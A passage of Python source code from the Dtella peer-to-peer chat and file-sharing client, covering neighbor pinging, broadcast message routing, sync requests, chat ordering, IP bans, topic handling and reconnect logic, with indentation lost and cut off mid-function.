def receivedPing(self, src_ipp, uwant, u_got_ack, req_key, ack_key, nbs):
osm = self.main.osm
try:
pn = self.pnbs[src_ipp]
except KeyError:
# If we're not fully online yet, then reject pings that we never
# asked for.
if not osm.syncd:
raise BadTimingError("Not ready to accept pings yet")
pn = self.pnbs[src_ipp] = self.PingNeighbor(src_ipp)
CHECK(osm.syncd or pn.outbound)
# Save list of this node's neighbors
if nbs is not None:
pn.ping_nbs = tuple(nbs)
# Mark neighbor as inbound iff we got a uwant
pn.inbound = uwant
# If they requested an ACK, then we'll want to ping soon
ping_now = bool(req_key)
was_stronglyConnected = pn.stronglyConnected()
# Keep track of whether the remote node has received an ack from us
pn.u_got_ack = u_got_ack
# If this ping contains an acknowledgement...
if ack_key:
try:
sendtime = pn.ping_reqs[ack_key]
except KeyError:
raise BadPacketError("PG: unknown ack")
# Keep track of ping delay
delay = seconds() - sendtime
self.main.logPacket("Ping: %f ms" % (delay * 1000.0))
if pn.avg_ping is None:
pn.avg_ping = delay
else:
pn.avg_ping = 0.8 * pn.avg_ping + 0.2 * delay
# If we just got the first ack, then send a ping now to
# send the GOTACK bit to neighbor
if not pn.got_ack:
pn.got_ack = True
ping_now = True
dcall_discard(pn, 'deadNb_dcall')
# Schedule next ping in ~5 seconds
self.pingWithRetransmit(pn, tries=4, later=True)
# Got ack, so reset the online timeout
self.scheduleOnlineTimeout()
if not was_stronglyConnected and pn.stronglyConnected():
# Just got strongly connected.
if pn.outbound:
self.scheduleChopExcessLinks()
# If we have a good solid link, then the sync procedure
# can begin.
if not (osm.syncd or osm.sm):
osm.sm = SyncManager(self.main)
# Decide whether to request an ACK. This is in a nested
# function to make the logic more redable.
def i_req():
if not (pn.outbound or pn.inbound):
# Don't request an ack for an unwanted connection
return False
if not pn.stillAlive():
# Try to revitalize this connection
return True
if (ping_now and
hasattr(pn.sendPing_dcall, 'ping_is_shortable') and
dcall_timeleft(pn.sendPing_dcall) <= 1.0
):
# We've got a REQ to send out in a very short time, so
# send it out early with this packet we're sending already.
return True
return False
if i_req():
# Send a ping with ACK requesting + retransmits
self.pingWithRetransmit(pn, tries=4, later=False, ack_key=req_key)
elif ping_now:
# Send a ping without an ACK request
self.sendPing(pn, i_req=False, ack_key=req_key)
# If neither end wants this connection, throw it away.
if not (pn.outbound or pn.inbound):
self.cancelInactiveLink(pn)
def pingWithRetransmit(self, pn, tries, later, ack_key=None):
dcall_discard(pn, 'sendPing_dcall')
pn.ping_reqs.clear()
def cb(tries):
pn.sendPing_dcall = None
# Send the ping
self.sendPing(pn, True)
# While tries is positive, use 1 second intervals.
# When it hits zero, trigger a timeout. As it goes negative,
# pings get progressively more spaced out.
if tries > 0:
when = 1.0
else:
tries = max(tries, -7)
when = 2.0 ** -tries # max of 128 sec
# Tweak the delay
when *= random.uniform(0.9, 1.1)
# Schedule retransmit
pn.sendPing_dcall = reactor.callLater(when, cb, tries-1)
# Just failed now
if tries == 0:
if self.main.osm.syncd and pn.got_ack:
# Note that we had to set sendPing_dcall before this.
self.handleNodeFailure(pn.ipp)
pn.got_ack = False
# If this was an inbound node, forget it.
pn.inbound = False
if pn.outbound:
# An outbound link just failed. Go find another one.
self.scheduleMakeNewLinks()
else:
# Neither side wants this link. Clean up.
self.cancelInactiveLink(pn)
if later:
when = 5.0
else:
# Send first ping
self.sendPing(pn, True, ack_key)
tries -= 1
when = 1.0
# Schedule retransmit(s)
when *= random.uniform(0.9, 1.1)
pn.sendPing_dcall = reactor.callLater(when, cb, tries)
# Leave a flag value in the dcall so we can test whether this
# ping can be made a bit sooner
if later:
pn.sendPing_dcall.ping_is_shortable = True
def cancelInactiveLink(self, pn):
# Quietly remove an unwanted ping neighbor.
CHECK(not pn.inbound)
CHECK(not pn.outbound)
dcall_discard(pn, 'sendPing_dcall')
dcall_discard(pn, 'deadNb_dcall')
del self.pnbs[pn.ipp]
def instaKillNeighbor(self, pn):
# Unconditionally drop neighbor connection (used for bans)
iwant = pn.outbound
pn.inbound = False
pn.outbound = False
self.cancelInactiveLink(pn)
if iwant:
self.scheduleMakeNewLinks()
def handleNodeFailure(self, ipp, nb_ipp=None):
osm = self.main.osm
CHECK(osm and osm.syncd)
# If this node isn't my neighbor, then don't even bother.
try:
pn = self.pnbs[ipp]
except KeyError:
return
# Only accept a remote failure if that node is a neighbor of pn.
if nb_ipp and pn.ping_nbs is not None and nb_ipp not in pn.ping_nbs:
return
# If this node's not online, don't bother.
try:
n = osm.lookup_ipp[ipp]
except KeyError:
return
# A bridge node will just have to time out on its own
if n.bridge_data:
return
# If the node's about to expire anyway, don't bother
if dcall_timeleft(n.expire_dcall) <= NODE_EXPIRE_EXTEND * 1.1:
return
failedMe = not pn.stillAlive()
# Trigger an NF message if I've experienced a failure, and:
# - someone else just experienced a failure, or
# - someone else experienced a failure recently, or
# - I seem to be pn's only neighbor.
pkt_id = struct.pack('!I', n.status_pktnum)
if failedMe and (nb_ipp or pn.deadNb_dcall or pn.ping_nbs==()):
dcall_discard(pn, 'deadNb_dcall')
packet = osm.mrm.broadcastHeader('NF', n.ipp)
packet.append(pkt_id)
packet.append(n.sesid)
try:
osm.mrm.newMessage(''.join(packet), tries=2)
except MessageCollisionError:
# It's possible, but rare, that we've seen this NF before
# without fully processing it.
pass
osm.scheduleNodeExpire(n, NODE_EXPIRE_EXTEND)
elif nb_ipp:
# If this failure was reported by someone else, then set the
# deadNb_dcall, so when I detect a failure, I'll be sure of it.
def cb():
pn.deadNb_dcall = None
dcall_discard(pn, 'deadNb_dcall')
pn.deadNb_dcall = reactor.callLater(15.0, cb)
elif pn.ping_nbs:
# Reported by me, and pn has neighbors, so
# Send Possible Failure message to pn's neighbors
packet = ['PF']
packet.append(osm.me.ipp)
packet.append(n.ipp)
packet.append(pkt_id)
packet.append(n.sesid)
packet = ''.join(packet)
for nb_ipp in pn.ping_nbs:
ad = Ad().setRawIPPort(nb_ipp)
self.main.ph.sendPacket(packet, ad.getAddrTuple())
def scheduleMakeNewLinks(self):
# Call this whenever a new sync'd node is added
# Or when a connected link dies
# This never needs to run more than once per reactor loop
if self.makeNewLinks_dcall:
return
def cb():
self.makeNewLinks_dcall = None
osm = self.main.osm
# Make sure the K closest nonbroken nodes are marked as outbound
n_alive = 0
for n in osm.nodes:
try:
pn = self.pnbs[n.ipp]
except KeyError:
pn = self.pnbs[n.ipp] = self.PingNeighbor(n.ipp)
if not pn.outbound:
if not pn.inbound:
# Completely new link
tries = 2
elif pn.stronglyConnected():
# An active inbound link is being marked as outbound,
# so we might want to close some other outbound
# link. Note that this won't run until the next
# reactor loop.
self.scheduleChopExcessLinks()
tries = 4
else:
# Existing link, not strongly connected yet
tries = 2
pn.outbound = True
self.pingWithRetransmit(pn, tries=tries, later=False)
if pn.outbound and pn.stillAlive():
n_alive += 1
if n_alive >= self.OUTLINK_GOAL:
break
self.makeNewLinks_dcall = reactor.callLater(0, cb)
def scheduleChopExcessLinks(self):
# Call this whenever a link goes from a connecting state to an
# active state.
# This never needs to run more than once per reactor loop
if self.chopExcessLinks_dcall:
return
def cb():
self.chopExcessLinks_dcall = None
osm = self.main.osm
# Keep a set of unwanted outbound neighbors. We will remove
# wanted neighbors from this set, and kill what remains.
unwanted = set(pn.ipp for pn in self.pnbs.itervalues()
if pn.outbound)
n_alive = 0
for n in osm.nodes:
try:
pn = self.pnbs[n.ipp]
if not pn.outbound:
raise KeyError
except KeyError:
# We ran out of nodes before hitting the target number
# of strongly connected nodes. That means stuff's still
# connecting, and there's no need to remove anyone.
unwanted.clear()
break
# This neighbor is NOT unwanted.
unwanted.remove(pn.ipp)
# Stop once we reach the desired number of outbound links.
if pn.stronglyConnected():
n_alive += 1
if n_alive == self.OUTLINK_GOAL:
break
# If any unwanted links remain, remove them.
for ipp in unwanted:
CHECK(self.removeOutboundLink(ipp))
self.chopExcessLinks_dcall = reactor.callLater(0, cb)
def scheduleOnlineTimeout(self):
# This will automatically shut down the node if we don't get any
# ping acknowledgements for a while
if self.onlineTimeout_dcall:
self.onlineTimeout_dcall.reset(ONLINE_TIMEOUT)
return
def cb():
self.onlineTimeout_dcall = None
self.main.showLoginStatus("Lost Sync!")
self.main.shutdown(reconnect='normal')
self.onlineTimeout_dcall = reactor.callLater(ONLINE_TIMEOUT, cb)
def removeOutboundLink(self, ipp):
try:
pn = self.pnbs[ipp]
except KeyError:
return False
if not pn.outbound:
return False
# Send iwant=0 to neighbor
pn.outbound = False
if pn.inbound:
self.pingWithRetransmit(pn, tries=4, later=False)
else:
self.sendPing(pn, i_req=False, ack_key=None)
self.cancelInactiveLink(pn)
return True
def sendPing(self, pn, i_req, ack_key=None):
# Transmit a single ping to the given node
osm = self.main.osm
# Expire old ack requests
if pn.ping_reqs:
now = seconds()
for req_key, when in pn.ping_reqs.items():
if now - when > 15.0:
del pn.ping_reqs[req_key]
iwant = pn.outbound
# For now, include neighbor list only when requesting an ack.
nblist = i_req
# Offline bit is set if this neighbor is not recognized.
# (this just gets ignored, but it could be useful someday)
offline = osm.syncd and (pn.ipp not in osm.lookup_ipp)
# Build packet
packet = ['PG']
packet.append(osm.me.ipp)
flags = ((iwant and IWANT_BIT) |
(pn.got_ack and GOTACK_BIT) |
(i_req and REQ_BIT) |
(bool(ack_key) and ACK_BIT) |
(nblist and NBLIST_BIT) |
(offline and OFFLINE_BIT)
)
packet.append(struct.pack('!B', flags))
if i_req:
# I'm requesting that this packet be acknowledged, so generate
# a new req_key
while True:
req_key = randbytes(4)
if req_key not in pn.ping_reqs:
break
pn.ping_reqs[req_key] = seconds()
packet.append(req_key)
if ack_key:
packet.append(ack_key)
if nblist:
if osm.syncd:
# Grab my list of ping neighbors.
nbs = [pn_it.ipp for pn_it in self.pnbs.itervalues()
if (pn_it.ipp != pn.ipp and
pn_it.ipp in osm.lookup_ipp and
pn_it.stronglyConnected())]
# Don't bother sending more than 8
nbs.sort()
del nbs[8:]
else:
nbs = []
packet.append(struct.pack("!B", len(nbs)))
packet.extend(nbs)
ad = Ad().setRawIPPort(pn.ipp)
self.main.ph.sendPacket(''.join(packet), ad.getAddrTuple())
def shutdown(self):
dcall_discard(self, 'chopExcessLinks_dcall')
dcall_discard(self, 'makeNewLinks_dcall')
dcall_discard(self, 'onlineTimeout_dcall')
outbounds = [pn for pn in self.pnbs.itervalues() if pn.outbound]
for pn in self.pnbs.values(): # can't use itervalues
pn.inbound = False
pn.outbound = False
self.cancelInactiveLink(pn)
for pn in outbounds:
self.sendPing(pn, i_req=False, ack_key=None)
##############################################################################
class MessageRoutingManager(object):
class Message(object):
# This is set for my own status messages only.
status_pktnum = None
def __init__(self, data, tries, sendto, ph):
# Message expiration timer.
self.expire_dcall = None
# If no tries remain, don't try to send anything.
if not tries > 0:
return
# {neighbor ipp -> retry dcall}
self.sending = {}
create_time = seconds()
for nb_ipp in sendto:
self.scheduleSend(data, tries, nb_ipp, create_time, ph)
self.cleanupIfDoneSending()
def scheduleSend(self, data, tries, nb_ipp, create_time, ph):
# Get ready to pass this message to a neighbor.
# If we're passing an NF to the node who's dying, then up the
# number of retries to 8, because it's rather important.
if data[0:2] == 'NF' and data[10:16] == nb_ipp:
tries = 8
def cb(tries):
# Ack timeout/retransmit callback
send_data = data
# Decrease the hop count by the number of seconds the packet
# has been buffered.
buffered_time = int(seconds() - create_time)
if buffered_time > 0:
hops = ord(data[8]) - buffered_time
if hops >= 0:
# Splice in the reduced hop count.
send_data = "%s%c%s" % (data[:8], hops, data[9:])
else:
# Drop packet.
tries = 0
# Make an attempt now
if tries > 0:
addr = Ad().setRawIPPort(nb_ipp).getAddrTuple()
ph.sendPacket(send_data, addr, broadcast=True)
# Reschedule another attempt
if tries-1 > 0:
when = random.uniform(1.0, 2.0)
self.sending[nb_ipp] = reactor.callLater(when, cb, tries-1)
else:
del self.sending[nb_ipp]
self.cleanupIfDoneSending()
# Send on the next reactor loop. This gives us a bit of time
# to listen for dupes from neighbors.
self.sending[nb_ipp] = reactor.callLater(0, cb, tries)
def cancelSendToNeighbor(self, nb_ipp):
# This neighbor already has the message, so don't send it.
try:
self.sending.pop(nb_ipp).cancel()
except (AttributeError, KeyError):
return
self.cleanupIfDoneSending()
def cleanupIfDoneSending(self):
# If no sends are left, free up some RAM.
if not self.sending:
del self.sending
def scheduleExpire(self, msgs, ack_key):
# Forget about this message, eventually.
if self.expire_dcall:
self.expire_dcall.reset(180.0)
return
def cb():
self.expire_dcall = None
self.cancelAllSends()
del msgs[ack_key]
self.expire_dcall = reactor.callLater(180.0, cb)
def cancelAllSends(self):
# Cancel any pending sends.
try:
self.sending
except AttributeError:
return
for d in self.sending.itervalues():
d.cancel()
del self.sending
def __init__(self, main):
self.main = main
self.msgs = {}
self.rcollide_last_NS = None
self.rcollide_ipps = set()
r = random.randint(0, 0xFFFFFFFF)
self.search_pktnum = r
self.chat_pktnum = r
self.main.osm.me.status_pktnum = r
def generateKey(self, data):
# 0:2 = kind
# 2:8 = neighbor ipp
# 8:9 = hop limit
# 9:10 = flags
# 10:16 = source ipp
# 16: = "the rest"
return md5(data[0:2] + data[10:]).digest()[:8]
def pokeMessage(self, ack_key, nb_ipp):
# If we know about this message, then mark down that this neighbor
# has acknowledged it.
try:
m = self.msgs[ack_key]
except KeyError:
# Don't know about this message
return False
# Extend the expiration time.
m.scheduleExpire(self.msgs, ack_key)
# If not locally-generated, tell the message that this neighbor
# acknowledged it.
if nb_ipp:
m.cancelSendToNeighbor(nb_ipp)
# Message is known.
return True
def newMessage(self, data, tries, nb_ipp=None):
# Forward a new message to my neighbors
kind = data[0:2]
ack_key = self.generateKey(data)
if ack_key in self.msgs:
raise MessageCollisionError("Duplicate " + kind)
ph = self.main.ph
osm = self.main.osm
# Get my current neighbors who we know to be alive. We don't
# need to verify pn.u_got_ack because it doesn't really matter.
sendto = (pn.ipp for pn in osm.pgm.pnbs.itervalues() if pn.got_ack)
# Start sending.
m = self.msgs[ack_key] = self.Message(data, tries, sendto, ph)
CHECK(self.pokeMessage(ack_key, nb_ipp))
if data[10:16] == osm.me.ipp:
CHECK(not self.main.hide_node)
if kind in ('NH','CH','SQ','TP'):
# Save the current status_pktnum for this message, because
# it's useful if we receive a Reject message later.
m.status_pktnum = osm.me.status_pktnum
elif kind == 'NS':
# Save my last NS message, so that if it gets rejected,
# it can be interpreted as a remote nick collision.
self.rcollide_last_NS = m
self.rcollide_ipps.clear()
def receivedRejection(self, ack_key, ipp):
# Broadcast rejection, sent in response to a previous broadcast if
# another node doesn't recognize us on the network.
# We attach a status_pktnum to any broadcast which could possibly
# be rejected. If this matches my status_pktnum now, then we should
# broadcast a new status, which will change status_pktnum and
# prevent this same broadcast from triggering another status update.
osm = self.main.osm
try:
m = self.msgs[ack_key]
except KeyError:
raise BadTimingError("Reject refers to an unknown broadcast")
if m is self.rcollide_last_NS:
# Remote nick collision might have occurred
self.rcollide_ipps.add(ipp)
if len(self.rcollide_ipps) > 1:
# Multiple nodes have reported a problem, so tell the user.
dch = self.main.getOnlineDCH()
if dch:
dch.remoteNickCollision()
# No more reports until next time
self.rcollide_last_NS = None
self.rcollide_ipps.clear()
if osm.me.status_pktnum == m.status_pktnum:
# One of my hash-containing broadcasts has been rejected, so
# send my full status to refresh everyone.
# (Note: m.status_pktnum is None for irrelevant messages.)
osm.sendMyStatus()
def getPacketNumber_search(self):
self.search_pktnum = (self.search_pktnum + 1) % 0x100000000
return self.search_pktnum
def getPacketNumber_chat(self):
self.chat_pktnum = (self.chat_pktnum + 1) % 0x100000000
return self.chat_pktnum
def getPacketNumber_status(self):
me = self.main.osm.me
me.status_pktnum = (me.status_pktnum + 1) % 0x100000000
return me.status_pktnum
def broadcastHeader(self, kind, src_ipp, hops=32, flags=0):
# Build the header used for all broadcast packets
packet = [kind]
packet.append(self.main.osm.me.ipp)
packet.append(struct.pack('!BB', hops, flags))
packet.append(src_ipp)
return packet
def shutdown(self):
# Cancel everything
for m in self.msgs.values():
dcall_discard(m, 'expire_dcall')
m.cancelAllSends()
self.msgs.clear()
# Immediately broadcast NX to my neighbors
ph = self.main.ph
osm = self.main.osm
if osm and osm.syncd and not self.main.hide_node:
packet = osm.makeExitPacket()
for pn in osm.pgm.pnbs.itervalues():
ad = Ad().setRawIPPort(pn.ipp)
ph.sendPacket(packet, ad.getAddrTuple(), broadcast=True)
##############################################################################
class SyncRequestRoutingManager(object):
class Message(object):
def __init__(self):
self.nbs = {} # {ipp: max hop count}
self.expire_dcall = None
def scheduleExpire(self, msgs, key):
if self.expire_dcall:
self.expire_dcall.reset(180.0)
return
def cb():
del msgs[key]
self.expire_dcall = reactor.callLater(180.0, cb)
def __init__(self, main):
self.main = main
self.msgs = {}
def receivedSyncRequest(self, nb_ipp, src_ipp, sesid, hop, timedout):
osm = self.main.osm
ph = self.main.ph
key = (src_ipp, sesid)
# Get ipp of all syncd neighbors who we've heard from recently
CHECK(osm and osm.syncd)
my_nbs = [pn.ipp for pn in osm.pgm.pnbs.itervalues()
if pn.got_ack and pn.ipp in osm.lookup_ipp]
# Put neighbors in random order
random.shuffle(my_nbs)
# See if we've seen this sync message before
try:
m = self.msgs[key]
isnew = False
except KeyError:
m = self.msgs[key] = self.Message()
isnew = True
# Expire the message in a while
m.scheduleExpire(self.msgs, key)
# Set the hop value of the neighbor who sent us this packet
try:
if m.nbs[nb_ipp] < hop+1:
raise KeyError
except KeyError:
m.nbs[nb_ipp] = hop+1
if hop > 0:
# Build packet to forward
packet = osm.mrm.broadcastHeader('YQ', src_ipp, hop-1)
packet.append(sesid)
packet = ''.join(packet)
# Contacted/Uncontacted lists
cont = []
uncont = []
for ipp in my_nbs:
# If we've already contacted enough nodes, or we know this
# node has already been contacted with a higher hop count,
# then don't forward the sync request to it.
try:
if len(cont) >= 3 or m.nbs[ipp] >= hop-1:
uncont.append(ipp)
continue
except KeyError:
pass
cont.append(ipp)
m.nbs[ipp] = hop-1
ad = Ad().setRawIPPort(ipp)
ph.sendPacket(packet, ad.getAddrTuple(), broadcast=True)
else:
# no hops left
cont = []
uncont = my_nbs
# Cut off after 16 nodes, just in case
uncont = uncont[:16]
if isnew or timedout:
self.sendSyncReply(src_ipp, cont, uncont)
def sendSyncReply(self, src_ipp, cont, uncont):
ad = Ad().setRawIPPort(src_ipp)
osm = self.main.osm
CHECK(osm and osm.syncd)
# Build Packet
packet = ['YR']
# My IP:Port
packet.append(osm.me.ipp)
# My last pktnum
packet.append(struct.pack('!I', osm.me.status_pktnum))
# If we send a YR which is almost expired, followed closely by
# an NH with an extended expire time, then a race condition exists,
# because the target could discard the NH before receiving the YR.
# So, if we're about to expire, go send a status update NOW so that
# we'll have a big expire time to give to the target.
expire = dcall_timeleft(osm.sendStatus_dcall)
if expire <= 5.0:
osm.sendMyStatus(sendfull=False)
expire = dcall_timeleft(osm.sendStatus_dcall)
# Exact time left before my status expires.
# (The receiver will add a few buffer seconds.)
packet.append(struct.pack('!H', int(expire)))
# Session ID, Uptime, Flags, Nick, Info
packet.extend(osm.getStatus())
# If I think I set the topic last, then put it in here.
# It's up to the receiving end whether they'll believe me.
if osm.tm.topic_node is osm.me:
topic = osm.tm.topic
else:
topic = ""
packet.append(struct.pack('!B', len(topic)))
packet.append(topic)
# Contacted Nodes
packet.append(struct.pack('!B', len(cont)))
packet.extend(cont)
# Uncontacted Nodes
packet.append(struct.pack('!B', len(uncont)))
packet.extend(uncont)
self.main.ph.sendPacket(''.join(packet), ad.getAddrTuple())
def shutdown(self):
# Cancel all timeouts
for m in self.msgs.values():
dcall_discard(m, 'expire_dcall')
##############################################################################
class ChatMessageSequencer(object):
# If chat messages arrive out-of-order, this will delay
# some messages for a couple seconds waiting for packets to arrive.
def __init__(self, main):
self.main = main
def addMessage(self, n, pktnum, nick, text, flags):
if not self.main.getStateObserver():
return
# False == the bridge wants us to queue everything
unlocked = not hasattr(n, 'dns_pending')
msg = (nick, text, flags)
if n.chatq_base is None:
n.chatq_base = pktnum
# How far forward/back to accept messages
FUZZ = 10
# Find the pktnum index relative to the current base.
# If it's slightly older, this will be negative.
idx = ((pktnum - n.chatq_base + FUZZ) % 0x100000000) - FUZZ
if idx < 0:
# Older message, send out of order
if unlocked:
self.sendMessage(n, msg)
elif idx >= FUZZ:
# Way out there; put this at the end and dump everything
if unlocked:
n.chatq.append(msg)
self.flushQueue(n)
else:
# From the near future: (0 <= idx < PKTNUM_BUF)
# Make sure the queue is big enough;
# put a timestamp in the empty spaces.
extra = (idx - len(n.chatq)) + 1
if extra > 0:
n.chatq.extend([seconds()] * extra)
# Insert the current message into its space
if (type(n.chatq[idx]) is float):
n.chatq[idx] = msg
# Possible spoof?
# Don't know which one's real, so flush the queue and move on.
elif n.chatq[idx] != msg:
if unlocked:
n.chatq.insert(idx + 1, msg)
self.flushQueue(n)
return
if unlocked:
self.advanceQueue(n)
def advanceQueue(self, n):
# Send first block of available messages
while n.chatq and (type(n.chatq[0]) is not float):
msg = n.chatq.pop(0)
n.chatq_base = (n.chatq_base + 1) % 0x100000000
self.sendMessage(n, msg)
dcall_discard(n, 'chatq_dcall')
# If any messages remain, send them later.
if not n.chatq:
return
def cb():
n.chatq_dcall = None
# Forget any missing messages at the beginning
while n.chatq and (type(n.chatq[0]) is float):
n.chatq.pop(0)
n.chatq_base = (n.chatq_base + 1) % 0x100000000
# Send the first block of available messages
self.advanceQueue(n)
# The first queue entry contains a timestamp.
# Let the gap survive for 2 seconds total.
when = max(0, n.chatq[0] + 2.0 - seconds())
n.chatq_dcall = reactor.callLater(when, cb)
def flushQueue(self, n):
# Send all the messages in the queue, in order
for msg in n.chatq:
if (type(msg) is not float):
self.sendMessage(n, msg)
self.clearQueue(n)
def clearQueue(self, n):
# Reset everything to normal
del n.chatq[:]
dcall_discard(n, 'chatq_dcall')
n.chatq_base = None
def sendMessage(self, n, msg):
so = self.main.getStateObserver()
if so:
nick, text, flags = msg
so.event_ChatMessage(n, nick, text, flags)
##############################################################################
class BanManager(object):
def __init__(self, main):
self.main = main
self.rebuild_bans_dcall = None
self.ban_matcher = SubnetMatcher()
self.isBanned = self.ban_matcher.containsIP
def scheduleRebuildBans(self):
if self.rebuild_bans_dcall:
return
def cb():
self.rebuild_bans_dcall = None
osm = self.main.osm
self.ban_matcher.clear()
# Get all bans from bridges.
if osm.bcm:
for bridge in osm.bcm.bridges:
for b in bridge.bans.itervalues():
if b.enable:
self.ban_matcher.addRange(b.ipmask)
# If I'm a bridge, get bans from IRC.
if osm.bsm and self.main.ism:
for ipmask in self.main.ism.bans:
self.ban_matcher.addRange(ipmask)
self.enforceAllBans()
# This time is slightly above zero, so that broadcast deliveries
# will have a chance to take place before carnage occurs.
self.rebuild_bans_dcall = reactor.callLater(1.0, cb)
def enforceAllBans(self):
osm = self.main.osm
# Check all the online nodes.
for n in list(osm.nodes):
int_ip = Ad().setRawIPPort(n.ipp).getIntIP()
if self.isBanned(int_ip):
osm.nodeExited(n, "Node Banned")
# Check my ping neighbors.
for pn in osm.pgm.pnbs.values(): # can't use itervalues
int_ip = Ad().setRawIPPort(pn.ipp).getIntIP()
if self.isBanned(int_ip):
osm.pgm.instaKillNeighbor(pn)
# Check myself
if not osm.bsm:
int_ip = Ad().setRawIPPort(osm.me.ipp).getIntIP()
if self.isBanned(int_ip):
self.main.showLoginStatus("You were banned.")
self.main.shutdown(reconnect='max')
def shutdown(self):
dcall_discard(self, 'rebuild_bans_dcall')
##############################################################################
class TopicManager(object):
def __init__(self, main):
self.main = main
self.topic = ""
self.topic_whoset = ""
self.topic_node = None
self.waiting = True
def gotTopic(self, n, topic):
self.updateTopic(n, n.nick, topic, changed=True)
def receivedSyncTopic(self, n, topic):
# Topic arrived from a YR packet
if self.waiting:
self.updateTopic(n, n.nick, topic, changed=False)
def updateTopic(self, n, nick, topic, changed):
# Don't want any more SyncTopics
self.waiting = False
# Don't allow a non-bridge node to override a bridge's topic
if self.topic_node and n:
if self.topic_node.bridge_data and (not n.bridge_data):
return False
# Sanitize the topic
topic = topic[:255].replace('\r','').replace('\n','')
# Get old topic
old_topic = self.topic
# Store stuff
self.topic = topic
self.topic_whoset = nick
self.topic_node = n
# Without DC, there's nothing to say
dch = self.main.getOnlineDCH()
if not dch:
return True
# If it's changed, push it to the title bar
if topic != old_topic:
dch.pushTopic(topic)
# If a change was reported, tell the user that it changed.
if changed and nick:
dch.pushStatus("%s changed the topic to: %s" % (nick, topic))
# If a change wasn't reported, but it's new to us, and it's not
# empty, then just say what the topic is.
if not changed and topic and topic != old_topic:
dch.pushStatus(self.getFormattedTopic())
return True
def broadcastNewTopic(self, topic):
osm = self.main.osm
if len(topic) > 255:
topic = topic[:255]
# Update topic locally
if not self.updateTopic(osm.me, osm.me.nick, topic, changed=True):
# Topic is controlled by a bridge node
self.topic_node.bridge_data.sendTopicChange(topic)
return
packet = osm.mrm.broadcastHeader('TP', osm.me.ipp)
packet.append(struct.pack('!I', osm.mrm.getPacketNumber_search()))
packet.append(osm.me.nickHash())
packet.append(struct.pack('!B', len(topic)))
packet.append(topic)
osm.mrm.newMessage(''.join(packet), tries=4)
def getFormattedTopic(self):
if not self.topic:
return "There is currently no topic set."
text = "The topic is: %s" % self.topic
if self.topic_node and self.topic_node.nick:
whoset = self.topic_node.nick
else:
whoset = self.topic_whoset
if whoset:
text += " (set by %s)" % whoset
return text
def checkLeavingNode(self, n):
# If the node who set the topic leaves, wipe out the topic
if self.topic_node is n:
self.updateTopic(None, "", "", changed=False)
##############################################################################
class DtellaMain_Base(object):
def __init__(self):
self.myip_reports = []
self.reconnect_dcall = None
self.reconnect_interval = RECONNECT_RANGE[0]
# Initial Connection Manager
self.icm = None
# Neighbor Connection Manager
self.osm = None
self.accept_IQ_trigger = False
# Pakcet Encoder
self.pk_enc = dtella.common.crypto.PacketEncoder(local.network_key)
# Register a function that runs before shutting down
reactor.addSystemEventTrigger('before', 'shutdown',
self.cleanupOnExit)
# Set to True to prevent this node from broadcasting.
self.hide_node = False
def cleanupOnExit(self):
raise NotImplementedError("Override me!")
def reconnectDesired(self):
raise NotImplementedError("Override me!")
def startConnecting(self):
raise NotImplementedError("Override me!")
def startInitialContact(self):
# If all the conditions are right, start connection procedure
CHECK(not (self.icm or self.osm))
dcall_discard(self, 'reconnect_dcall')
def cb(result):
self.icm = None
result, node_ipps = result
if result == 'good':
self.startNodeSync(node_ipps)
elif result == 'banned_ip':
self.showLoginStatus(
"Your IP seems to be banned from this network.")
self.shutdown(reconnect='max')
elif result == 'foreign_ip':
try:
my_ip = self.selectMyIP(allow_bad=True).getTextIP()
except ValueError:
my_ip = "?"
self.showLoginStatus(
"Your IP address (%s) is not authorized to use "
"this network." % my_ip)
self.shutdown(reconnect='max')
elif result == 'dead_port':
self.needPortForward()
elif result == 'no_nodes':
self.showLoginStatus(
"No online nodes found.")
self.shutdown(reconnect='normal')
# If we receive an IQ packet after finding no nodes, then
# assume we're a root node and form an empty network
if not self.hide_node:
self.accept_IQ_trigger = True
else:
# Impossible result
CHECK(False)
self.ph.remap_ip = None
self.icm = InitialContactManager(self)
self.icm.start().addCallback(cb)
def needPortForward(self):
self.showLoginStatus(
"*** UDP PORT FORWARD REQUIRED ***")
text = (
"In order for Dtella to communicate properly, it needs to "
"receive UDP traffic from the Internet. Dtella is currently "
"listening on UDP port %d, but the packets appear to be "
"getting blocked, most likely by a firewall or a router. "
"If this is the case, then you will have to configure your "
"firewall or router to allow UDP traffic through on this "
"port. You may tell Dtella to use a different port from "
"now on by typing !UDP followed by a number."
" "
"Note: You will also need to unblock or forward a TCP port "
"for your DC++ client to be able to transfer files."
% self.state.udp_port
)
for line in word_wrap(text):
self.showLoginStatus(line)
self.shutdown(reconnect='max')
def startNodeSync(self, node_ipps):
# Determine my IP address and enable the osm
CHECK(not (self.icm or self.osm))
# Reset the reconnect interval
self.reconnect_interval = RECONNECT_RANGE[0]
dcall_discard(self, 'reconnect_dcall')
# Get my address and port
try:
my_ipp = self.selectMyIP().getRawIPPort()
except ValueError:
self.showLoginStatus("Can't determine my own IP?!")
return
# Look up my location string
if local.use_locations:
self.queryLocation(my_ipp)
# Get Bridge Client/Server Manager, or nothing.
b = self.getBridgeManager()
# Enable the object that keeps us online
self.osm = OnlineStateManager(self, my_ipp, node_ipps, **b)
def getBridgeManager(self):
raise NotImplementedError("Override me!")
def queryLocation(self, my_ipp):
raise NotImplementedError("Override me!")
def logPacket(self, text):
raise NotImplementedError("Override me!")
def showLoginStatus(self, text, counter=None):
raise NotImplementedError("Override me!")
def shutdown(self, reconnect):
# Do a total shutdown of this Dtella node
# It's possible for these both to be None, but we still
# want to reconnect. (i.e. after an ICM failure)
if (self.icm or self.osm):
self.showLoginStatus("Shutting down.")
dcall_discard(self, 'reconnect_dcall')
self.accept_IQ_trigger = False
# Shut down InitialContactManager
if self.icm:
self.icm.shutdown()
self.icm = None
# Shut down OnlineStateManager
if self.osm:
# Notify any observers that all the nicks are gone.
if self.osm.syncd:
self.stateChange_DtellaDown()
self.osm.shutdown()
self.osm = None
# Notify some random handlers of the shutdown
self.afterShutdownHandlers()
# Schedule a Reconnect (maybe) ...
# Check if a reconnect makes sense right now
if not self.reconnectDesired():
return
if reconnect == 'no':
return
elif reconnect == 'max':
self.reconnect_interval = RECONNECT_RANGE[1]
else:
CHECK(reconnect in ('normal', 'instant'))
if reconnect == 'instant':
# Just do an instant reconnect without saying anything.
when = 0
self.reconnect_interval = RECONNECT_RANGE[0]
else:
# Decide how long to wait before reconnecting
when = self.reconnect_interval * random.uniform(0.8, 1.2)
# Increase the reconnect interval logarithmically
self.reconnect_interval = min(self.reconnect_interval * 1.5,
RECONNECT_RANGE[1])
self.showLoginStatus("--")
self.showLoginStatus(
"Next reconnect attempt in %d seconds." % when)
def cb():
